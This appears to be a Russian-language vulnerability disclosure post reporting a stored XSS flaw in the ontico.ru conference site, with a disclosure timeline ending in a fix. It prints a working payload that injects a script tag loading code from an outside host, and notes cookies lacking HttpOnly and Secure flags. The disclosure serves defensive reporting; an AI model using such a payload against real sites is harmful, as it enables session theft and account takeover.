TOPSecret: Highload, РИТ, BackendConf, RootConf и прочие от ontico.ru

Привет,
Эта статья запаролена и доступна только вам и только по паролю, который я вам скидывал.

Вообщем, решил я сходить к вам на конференцию и все такое.
Но увидел отсутствие валидаций на некоторых полях и вот попробовал: https://www.youtube.com/watch?v=5ecruXEREok

Вектор: "-->'></script><script/src=//ananev.me/xss.js></script>"

POC живет тут http://conf.ontico.ru/lectures/462130/discuss

Опасность в том, что у вас cookie у вас без httponly, secure и прочих полезных флагов, а это плохо. Ну как-то так, крч) Эта уязвимость позволяет скомпрометировать аккаунты ВСЕХ пользователей, как простых, так и администраторов и выдавать билеты и так далее скорее всего. Дальше не изучал, чтобы не навредить. Надеюсь на понимание.

UPD Если нажать редактирование, то все XSS превращаются в хранимые https://youtu.be/379xnKrRajA

 

History
– 4 feb, 2017 1:38PM – Оповещение на oleg.bunin@ontico.ru, support@ontico.ru так как только такие адреса нашел.
– 6 feb, 2017 2:33PM – Сказали что напрягают программистов и исправляют 🙂
– 21 feb, 2017 10:51 AM  – Не исправлена только хранимая XSS в комментарии и хранимые при изменениях
– 25 feb, 2017 1:28 PM – Вроде исправлена проблема  🙂

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.